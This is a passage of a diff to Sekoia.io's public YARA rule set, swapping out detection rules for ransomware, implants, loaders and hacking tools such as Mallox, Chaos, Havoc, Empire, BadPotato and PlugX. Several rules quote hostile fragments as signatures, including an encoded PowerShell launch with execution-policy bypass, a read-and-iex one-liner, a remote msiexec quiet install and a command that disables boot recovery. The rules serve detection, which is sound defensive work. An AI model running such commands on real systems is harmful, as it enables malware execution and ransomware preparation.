+		$ = "revsocks -listen"
+		$ = "Start on the DNS server: revsocks -dns"
+		$ = "crypto/aes."
 
 	condition:
-		all of them and filesize < 2MB
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a or uint32be( 0 ) == 0xfeedface or uint32be( 0 ) == 0xfeedfacf or uint32be( 0 ) == 0xcafebabe or uint32be( 0 ) == 0xCFFAEDFE ) and 3 of them
 }
-rule SEKOIA_Exploit_Linux_Eop_Rationallove_Strings : FILE
+rule SEKOIA_Tool_Win_Forkplayground : FILE
 {
 	meta:
-		description = "Detects RationalLove Local Privesc exploit"
+		description = "Detect the ForkPlayground malware"
 		author = "Sekoia.io"
-		id = "e71e026e-ca2c-42b7-b552-b3fd013676db"
-		date = "2023-12-08"
+		id = "ec9af403-7647-447d-af17-c6931363a166"
+		date = "2023-02-28"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/exploit_linux_eop_rationallove_strings.yar#L1-L17"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_win_forkplayground.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "84a53a1d4f08e178a5cf1c968b3b98ae8624c3d052760517ec88bddd25833108"
+		logic_hash = "23d93b7eef978f76c9aa6c0bc28a661d160b0a871fd320442b6c27bc92bc279e"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -256114,72 +256282,66 @@ rule SEKOIA_Exploit_Linux_Eop_Rationallove_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "../x/../../AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/"
-		$ = "Detected OS version: %s"
-		$ = "Content-Type: text/plain; charset=UTF-8"
+		$ = "Failed to open dump file %s with the last error %i."
+		$ = "Successfully dumped process %i to %s"
+		$ = "ForkPlayground"
+		$ = "Second attempt at taking a snapshot of the target failed. It is likely that there is a difference in process privilege or the handle was stripped."
+		$ = "Failed to take a snapshot of the target process. Attempting to escalate debug privilege..."
+		$ = "Failed to escalate debug privileges, are you running ForkDump as Administrator"
 
 	condition:
-		uint32be( 0 ) == 0x7f454c46 and filesize < 1MB and all of them
+		uint16( 0 ) == 0x5A4D and 1 of them
 }
-rule SEKOIA_Ransomware_Mallox : FILE
+rule SEKOIA_Malware_Swordldr : FILE
 {
 	meta:
-		description = "Rule to detect mallox ransomware samples."
+		description = "Detects Swordldr. Maybe chunk_1 is too restrictive"
 		author = "Sekoia.io"
-		id = "7e2edc94-26e4-4024-8bc0-8e90d76f5a96"
-		date = "2023-02-20"
+		id = "4068c007-50f4-4913-a352-4a40dd4e452b"
+		date = "2024-09-25"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/ransomware_mallox.yar#L1-L38"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/malware_swordldr.yar#L1-L29"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "c9300de42ee9eb3e820f49aa979234ff61c33dc6bf5d65bcb26e45b7126aafec"
+		hash = "d0cc758082e303275cbb8cd6b2048eff"
+		hash = "7aa57da44718cd88f7d37b33a5d3ad74"
+		logic_hash = "9e408181b9122925c0ff9efdaed688e659596b58b9108c0f280d9bc1624d73cb"
 		score = 75
-		quality = 54
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
-		modification_date = "2023-05-24"
 		classification = "TLP:CLEAR"
-		hash1 = "2a549489e2455a2d84295604e29c727dd20d65f5a874209840ce187c35d9a439"
-		hash2 = "3f843cbffeba010445dae2b171caaa99c6b56360de5407da71210d007fe26673"
-		hash3 = "4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6"
-		hash4 = "4db69a0643f6ec795e5450a0563605e91293f233aa60715ae09ed8effa3b7267"
-		hash5 = "77fdce66e7f909300e4493cbe7055254f7992ba65f9b7445a6755d0dbd9f80a5"
-		hash6 = "8e974a3be94b7748f7971f278160a74d738d5cab2c3088b1492cfbbd05e83e22"
-		hash7 = "a5085e571857ec54cf9625050dfc29a195dad4d52bea9b69d3f22e33ed636525"
-		hash8 = "df64e87ecb30f4cadf54f2c1b3d3cba8cc2d315db0fd4af2d11add57baa56f6a"
-		hash9 = "e7e00e0f817fcb305f82aec2e60045fcdb1b334b2621c09133b6b81284002009"
 
 	strings:
-		$s1 = "C:\\HOW TO RECOVER !!.TXT" wide ascii nocase
-		$s2 = "SYSTEM\\CurrentControlSet\\Services\\EventLog\\Application\\Raccine" wide ascii nocase
-		$s3 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\vssadmin.exe" wide ascii nocase
-		$s4 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\wmic.exe" wide ascii nocase
-		$s5 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\wbadmin.exe" wide ascii nocase
-		$s6 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\bcdedit.exe" wide ascii nocase
-		$s7 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\powershell.exe" wide ascii nocase
-		$s8 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\diskshadow.exe" wide ascii nocase
-		$s9 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\net.exe" wide ascii nocase
-		$s10 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskkill.exe" wide ascii nocase
-		$s11 = "bcdedit /set {current} recoveryenabled no" wide ascii nocase
-		$mallox_fargo = ".FARGO" wide ascii nocase
-		$mallox_mallox = ".mallox" wide ascii nocase
-		$mallox_exploit = "newexploit@tutanota.com"
+		$ = { CC CC CC CC B0 01 C3 CC CC CC CC }
+		$ = { CC CC CC CC B0 02 C3 CC CC CC CC }
+		$ = { CC CC CC CC B0 03 C3 CC CC CC CC }
+		$ = { CC CC CC CC B0 04 C3 CC CC CC CC }
+		$ = { CC CC CC CC B0 05 C3 CC CC CC CC }
+		$ = { CC CC CC CC B0 06 C3 CC CC CC CC }
+		$ = { CC CC CC CC B0 07 C3 CC CC CC CC }
+		$ = { CC CC CC CC B0 08 C3 CC CC CC CC }
+		$ = { CC CC CC CC B0 09 C3 CC CC CC CC }
+		$chunk_1 = {
+        48 63 44 24 40 44 8B 44 86 04 48 63 44 24 40 45 23 ?? 45 03 C0 8B 54 86 04 48 63 44 24 40 41 2B D0 41 03 ?? 89 54 86 04
+        }
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and all of ( $s* ) and 1 of ( $mallox_* )
+		uint16be( 0 ) == 0x4d5a and 4 of them and #chunk_1 > 5
 }
-rule SEKOIA_Implant_Win_Havoc_Default_Strings : FILE
+
+rule SEKOIA_Implant_Win_Lyceum : FILE
 {
 	meta:
-		description = "Finds Havoc implants based on the embedded default strings"
+		description = "Detect the DnsSystem malware used by Lyceum in March 2022"
 		author = "Sekoia.io"
-		id = "955c2211-4502-4258-ba4c-0d96a5624283"
-		date = "2022-10-07"
+		id = "e061562f-9c17-4ef4-b7f9-2c6708bb6570"
+		date = "2022-06-13"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/implant_win_havoc_default_strings.yar#L1-L23"
+		reference = "https://www.zscaler.com/blogs/security-research/lyceum-net-dns-backdoor"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/implant_win_lyceum.yar#L4-L30"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "dbf17e579071f265961657d73c6a2e51630b23e80376491df2e631cee5ffb1b4"
+		logic_hash = "f6b4acf48877c1dd62fd2bfa19d701b0a79f052ec44fc5d4fe3dc7b02aa689c8"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -256187,31 +256349,24 @@ rule SEKOIA_Implant_Win_Havoc_Default_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "C:\\Windows\\System32\\notepad.exe" ascii
-		$str02 = "C:\\Windows\\SysWOW64\\notepad.exe" ascii
-		$str03 = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36" ascii
-		$str04 = "POST" wide
-		$str05 = "\\??\\C:\\Windows\\System32\\ntdll.dll" wide
-		$str06 = "X-Havoc: true" ascii
-		$str07 = "X-Havoc-Agent: Demon" ascii
-		$str08 = "/text.gif" ascii
-		$str09 = "SeImpersonatePrivilege" ascii
+		$ = "$02c7afab-7f96-4dfa-b452-832e3624e270" ascii
+		$ = "C:\\Users\\u1\\Downloads\\Compressed\\article_src\\DnsDig\\DnsDig\\obj\\Release\\DnsDig.pdb" ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 6 of them
+		uint16( 0 ) == 0x5A4D and 1 of them or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "d0e0c140e4831f835bcdcc6b463f3acc" ) or for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "22c92a1ba6ffd828637d7045261db7a45608ddd6d7c85836af011b3c679c725f" )
 }
-rule SEKOIA_Generic_Sharpshooter_Payload_7 : FILE
+rule SEKOIA_Apt_Apt10_Hui_Loader : FILE
 {
 	meta:
-		description = "Detects payload created by SharpShooter"
+		description = "Specific string for HUI Loader"
 		author = "Sekoia.io"
-		id = "de8069bb-59d7-4753-974a-f77c4b9e9bae"
-		date = "2023-02-03"
+		id = "97d17052-80d0-4f8e-8b3a-2e0d622522a9"
+		date = "2022-07-04"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/generic_sharpshooter_payload_7.yar#L1-L18"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_apt10_hui_loader.yar#L1-L17"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "27b5f3d24f7269e80b628be044d828d365fdba25891a5a1ecc973c419cf1dc6c"
+		logic_hash = "33df202599c6bceff2cf76acdc0096f7167acb69c541b3cfe4cdc34edc174005"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -256219,103 +256374,84 @@ rule SEKOIA_Generic_Sharpshooter_Payload_7 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "ms.Write(ba, 0, (length / 4) * 3)"
-		$ = "var serialized_obj = "
-		$ = "var n = fmt.SurrogateSelector;"
-		$ = "var o = d.DynamicInvoke(al.ToArray())"
+		$s1 = "HUIHWASDIHWEIUDHDSFSFEFWEFEWFDSGEFERWGWEEFWFWEWD" wide fullword
 
 	condition:
-		all of them and filesize < 2MB
+		( uint16be( 0 ) == 0x4d5a ) and filesize > 30KB and filesize < 100KB and 1 of them
 }
-rule SEKOIA_Ransomware_Win_Chaos : FILE
+rule SEKOIA_Tool_Exploit_Badpotato_Strings : FILE
 {
 	meta:
-		description = "Detects the Chaos Ransomware"
+		description = "Detects BadPotato compiled exploit"
 		author = "Sekoia.io"
-		id = "c1876a18-0618-44e2-8919-b4a041de97e7"
-		date = "2022-01-18"
+		id = "079aabbc-6978-4d71-92d2-d2a7ce1cc915"
+		date = "2022-09-09"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/ransomware_win_chaos.yar#L1-L46"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_exploit_badpotato_strings.yar#L1-L22"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "1947e6de8f74fe7bc52107d4a57e19eacf022121f5decee54a8c90797be844c6"
+		logic_hash = "a45935ea5877a4b81468cbe0e1a4a7232b955771442f84bb3b88b7992ed23937"
 		score = 75
-		quality = 78
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$rep00 = "\\Desktop" wide
-		$rep01 = "\\Links" wide
-		$rep02 = "\\Contacts" wide
-		$rep03 = "\\Documents" wide
-		$rep04 = "\\Downloads" wide
-		$rep05 = "\\Pictures" wide
-		$rep06 = "\\Music" wide
-		$rep07 = "\\OneDrive" wide
-		$rep08 = "\\Saved Games" wide
-		$rep09 = "\\Favorites" wide
-		$rep10 = "\\Searches" wide
-		$rep11 = "\\Videos" wide
-		$rep12 = "C:\\Users\\" wide
-		$str0 = "svchost.exe" wide
-		$str1 = "\\privateKey.chaos" wide
-		$str2 = "Chaos Ransomware" wide
-		$str3 = "read_it.txt" wide
-		$str4 = "<EncryptedKey>" wide
-		$str5 = "passwordBytes" ascii
-		$str6 = "lookForDirectories" ascii
-		$str7 = "Rfc2898DeriveBytes" ascii
-		$str8 = "ICryptoTransform" ascii
-		$str9 = "FromBase64String" ascii
-		$ext0 = ".torrent" wide
-		$ext1 = ".ibank" wide
-		$ext2 = ".wallet" wide
-		$ext3 = ".swift" wide
-		$ext4 = ".onetoc2" wide
+		$ = "RpcStringBindingCompose failed with status 0x" wide
+		$ = "RpcBindingFromStringBinding failed with status 0x" wide
+		$ = "RpcBindingSetAuthInfoEx failed with status 0x" wide
+		$ = "RpcBindingSetOption failed with status 0x" wide
+		$ = "\\\\.\\pipe\\{0}\\pipe\\spoolss" wide
+		$ = "[*] {0} Success! ProcessPid:{1}" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 50KB and filesize < 2MB and 6 of ( $str* ) and 10 of ( $rep* ) and 4 of ( $ext* )
+		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 5 of them
 }
-rule SEKOIA_Backdoor_Powershellempire_Batlauchers : FILE
+rule SEKOIA_Backdoor_Sandman_Strings : FILE
 {
 	meta:
-		description = "Detect BAT launchers for Empire"
+		description = "Detect the Sandman backdoor based on strings"
 		author = "Sekoia.io"
-		id = "ad371665-ec59-45c8-9d99-2a675842c384"
-		date = "2022-04-15"
+		id = "7bac7a1e-7d4a-4410-9ad4-1c85beb6faaf"
+		date = "2022-08-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/backdoor_powershellempire_batlauchers.yar#L1-L17"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/backdoor_sandman_strings.yar#L1-L23"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "0453c739ad936b0cc5ed2e36ba4a011a90600b74ca23c08165c23a3e63fe60e9"
+		logic_hash = "74ee1b73532d9050d5ed7ea0bed158322288a2f5b65255804ebf10dc1a4ea55b"
 		score = 75
-		quality = 74
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "powershell -noP -sta -w 1 -enc  SQB" nocase wide ascii
-		$ = "powershell -ep bypass -noP -sta -w 1 -enc SQB" nocase wide ascii
-		$ = "-nol -nop -ep bypass \"[IO.File]::ReadAllText('%~f0')|iex" nocase wide ascii
+		$s1 = "e9f7c24c-879d-49f2-b9bf-2477dc28e2ee"
+		$s2 = "System.Net.Sockets"
+		$s3 = "ntpServer"
+		$s4 = "payloadUrl"
+		$s5 = "keepRunning"
+		$s6 = "payloadSize"
+		$s7 = "defaultNtpMessageSize"
+		$s8 = "InjectShellcode"
 
 	condition:
-		any of them and filesize < 1MB
+		uint16be( 0 ) == 0x4d5a and 7 of them or $s1
 }
-rule SEKOIA_Apt_Badmagic_Malicious_Lnk : FILE
+
+rule SEKOIA_Tool_Win_Blackfly_Proxy_Config : FILE
 {
 	meta:
-		description = "Detect LNK used by BadMagic to execute MSI payloads."
+		description = "Detect Blackfly proxy configuration tool"
 		author = "Sekoia.io"
-		id = "731bd51d-c4e4-4efb-9fa8-f981a8555ed3"
-		date = "2023-05-15"
+		id = "c8a8be5d-bd28-4306-9466-ad582e53fede"
+		date = "2023-02-28"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_badmagic_malicious_lnk.yar#L1-L19"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_win_blackfly_proxy_config.yar#L4-L29"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "b83749c71cefb485f8bbea1d465fc477de159e086efa04ebce4d0778a203ed89"
+		logic_hash = "a421d933209f3a81f7430f1b933074701a1fc965c1b4bc321cc7b4e89802f483"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -256323,61 +256459,52 @@ rule SEKOIA_Apt_Badmagic_Malicious_Lnk : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "/i http" wide
-		$ = ".msi /quiet" wide
-		$ = "%WINDIR%\\System32\\msiexec.exe"
+		$ = "c:\\ProgramData\\l.dat"
+		$ = "C:\\ProgramData\\b.dat"
+		$ = "winmm_DotNetfile.dll"
 
 	condition:
-		uint32be( 0 ) == 0x4c000000 and filesize < 1KB and all of them
+		pe.imphash( ) == "ff47f65286cc51a1328bc94efbf4007f" or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "f5923d4331f7e84fbbbd6fd84b6d3e6a" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "56acc10233c711a4eba9ca9aeab47e30" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "824dcebe93ac83bf5c95c781a60b3578" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "ec716a08b5e647f5c00c5dfc079dfa62" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "5cb63f7392c9e05c22e89cd86bd7f718" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "ee04e245066e25edd3062d823f15deda" ) or ( uint16( 0 ) == 0x5A4D and 1 of them )
 }
-rule SEKOIA_Infostealer_Win_Grmsk_Strings : FILE
+rule SEKOIA_Hacktool_Win_Processhacker : FILE
 {
 	meta:
-		description = "Finds GrMsk samples based on the specific strings"
+		description = "Detect ProcessHacker hacktool"
 		author = "Sekoia.io"
-		id = "58f32339-5e0f-405c-9acc-14b93f6c208b"
-		date = "2023-11-30"
+		id = "1dffe8c9-2ab7-4265-965e-8673b80f17d5"
+		date = "2022-09-09"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_grmsk_strings.yar#L1-L27"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/hacktool_win_processhacker.yar#L1-L17"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "a2f638556edf5b2cabcd67e7d29a9e3f554b707af688f79b89f2f67d493093b3"
+		logic_hash = "cfcfaa7f3afc8b82ce0188d9ead63746a7effd40acb6ad504f8d70a45d8476d5"
 		score = 75
-		quality = 55
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "ref.txt" ascii fullword
-		$str02 = "--------" ascii fullword
-		$str03 = "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/5362 (KHTML, like Gecko) Chrome/40.0.834.0 Mobile Safari/5362" ascii fullword
-		$str04 = "POST" ascii fullword
-		$str05 = "\\SearchWallet\\" ascii
-		$str06 = "1234niwef" ascii
-		$str07 = "afbcbjpbpfadlkmhmclhkeeodmamcflc" ascii
-		$str08 = "lodccjjbdhfakaekdiahmedfbieldgik" ascii
-		$str09 = "wallets" ascii
-		$str10 = "config" ascii
-		$str11 = "\"recently_open\": [" ascii
-		$str12 = "\"gui_last_wallet\": " ascii
-		$str13 = "YUOhtyugjKgdfgjFGghj676jj" ascii
+		$str0 = "Unable to uninstall KProcessHacker" wide
+		$str1 = "Process Hacker's settings file is corrupt. Do you want to reset it?" wide
+		$str2 = "Process Hacker uses the following components:" wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 10 of ( $str* )
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule SEKOIA_Guloader_Lnk_File : FILE
+
+rule SEKOIA_Plugx_Final_Payload : FILE
 {
 	meta:
-		description = "LNK file delivering Guloader"
+		description = "Detects encrypted plugx config with a specific size"
 		author = "Sekoia.io"
-		id = "ecc07753-0910-445b-bf84-911b17195894"
-		date = "2024-02-07"
+		id = "a4047324-81a7-4c17-be84-c0fa479d2f89"
+		date = "2023-07-04"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/guloader_lnk_file.yar#L1-L18"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/plugx_final_payload.yar#L3-L23"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "d69038a8b26c7fc7ba7b0968c7c91b589b25512dcf7e3ad5ee56453a4654a1ab"
+		logic_hash = "bf5035eb7ed620edcf7a0e8e8be220451ce268fc49310f28059b60576d8c5182"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -256385,56 +256512,57 @@ rule SEKOIA_Guloader_Lnk_File : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "$PSHOME" wide
-		$s2 = "&(${" wide
-		$s3 = "}::ToString(" wide
-		$s4 = "$([TYPE]${" wide
+		$s1 = {30 31 32 33 34 35 36 37 38 39 41 42 43 44 45 46 88 13 00 00 60 ea 00 00 ?? ?? ?? ?? 00 00 00 00}
 
 	condition:
-		uint32be( 0 ) == 0x4c000000 and all of them
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 8MB and for any i in ( 0 .. pe.number_of_sections -1 ) : ( pe.sections [ i ] . name == ".data" and $s1 in ( pe.sections [ i ] . raw_data_offset..pe.sections [ i ] . raw_data_offset + pe.sections [ i ] . raw_data_size ) )
 }
-
-rule SEKOIA_Backdoor_Win_Blackrat : FILE
+rule SEKOIA_Apt_Andariel_Nestdoor_Variants_Strings : FILE
 {
 	meta:
-		description = "Detect Andariel's Black RAT malware"
+		description = "Detects Nestdoor based on (weak) strings"
 		author = "Sekoia.io"
-		id = "3a5a6290-6344-45ce-8929-ea5a4451840f"
-		date = "2023-09-04"
+		id = "dcfc48ad-f17b-4224-912b-b01740080fea"
+		date = "2024-06-17"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/backdoor_win_blackrat.yar#L4-L33"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_andariel_nestdoor_variants_strings.yar#L1-L21"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "4edf1335e357ebc02e4abb51cd8d808ae39e649cf19cdb3ec667c9cf313181a9"
+		logic_hash = "bc01138d1fc079c2b778175742e121f10cb47f29cc4eb04d38b4f0f5740f05a4"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "c2500a6e12f22b16e221ba01952b69c92278cd05632283d8b84c55c916efe27c"
 
 	strings:
-		$s1 = "I:/01___Tools/02__RAT/Black/Client_Go/Client.go"
-		$s2 = "I:/01___Tools/02__RAT/Black/Client_Go/Define.go"
-		$s3 = "I:/01___Tools/02__RAT/Black/Client_Go/Screenshot.go"
-		$x1 = "RAT/Black/Client"
+		$v_11 = "Error occurs while reading" wide
+		$v_12 = "{DECIMAL}" wide
+		$v_13 = "lnk_" wide
+		$v_21 = "Cannot connect with your ip and your operating system." wide
+		$v_22 = "del /q /f %1" ascii
+		$v_23 = "/f /tn %2" ascii
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and ( all of ( $s* ) or #x1 >= 3 ) or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "74c4cdc9d33fc63aee7ae9659b6f8d24" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "298948afbe85985025e176605ee21176" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "e5ca54c5def3c7a950e6d4034dc86277" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "440ae899aea859458df5b6de7dbc5b34" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "98e46f76b965ffb58f6cd53ff8dc91c0" )
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and ( all of ( $v_1* ) or all of ( $v_2* ) )
 }
-rule SEKOIA_Tool_Tokenplayer_Strings : FILE
+rule SEKOIA_Unknown_Quad7_Wildcard_Login : FILE
 {
 	meta:
-		description = "Detects TokenPlayer based on strings"
+		description = "Detects the (x|r|a)login bind shells"
 		author = "Sekoia.io"
-		id = "74ed8812-f113-47a9-9ff2-6cbe2746ee11"
-		date = "2024-11-04"
+		id = "01510244-0795-4299-aa66-056a2b4682e7"
+		date = "2024-07-18"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_tokenplayer_strings.yar#L1-L25"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/unknown_quad7_wildcard_login.yar#L1-L23"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "f01eae4ee3cc03d621be7b0af7d60411"
-		logic_hash = "e419fa8c690816cd0e449f0a1d66d170e8806b38a99758631719b239363e330e"
+		hash = "4d9067e7cf517158337123a30a9bd0e3"
+		hash = "43ea387b8294cc4d0baaef6d26ff7c72"
+		hash = "777d6f907da38365924a0c2a12e973c5"
+		hash = "8542a3cbe232fe78baa0882736c61926"
+		hash = "1b08725acc371f6b7d05bb72d0c2d759"
+		logic_hash = "72de6fe656313bdd4f4b092ceca7248c67b8047c224104cd569dff7af1d86135"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -256442,89 +256570,77 @@ rule SEKOIA_Tool_Tokenplayer_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "[*]Spawning Process as user: %s\\%s" wide
-		$ = "[-]Target isn't vulnerable!"
-		$ = "[+]Process spawned!"
-		$ = "[+]Process Spawned"
-		$ = "[+]OpenProcessToken() success!"
-		$ = "CreateProcessWithLogonW() error : % u"
-		$ = "[+]CreateProcessWithLogonW() succeed!"
-		$ = "TokenPlayer.pdb"
+		$string1 = { 2f 62 69 6e 2f 73 68 00 2f 74 6d 70 2f 6c 6f 67 69 6e }
+		$string2 = { 2f 62 69 6e 2f 73 68 00 2d 63 00 65 78 69 74 20 30 }
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 5 of them and filesize < 500KB
+		uint32be( 0 ) == 0x7f454c46 and filesize < 180KB and @string2 - @string1 < 3400
 }
-rule SEKOIA_Apt_Apt28_Htmlsmuggling
+
+rule SEKOIA_Implant_Win_Apt29_2022_10
 {
 	meta:
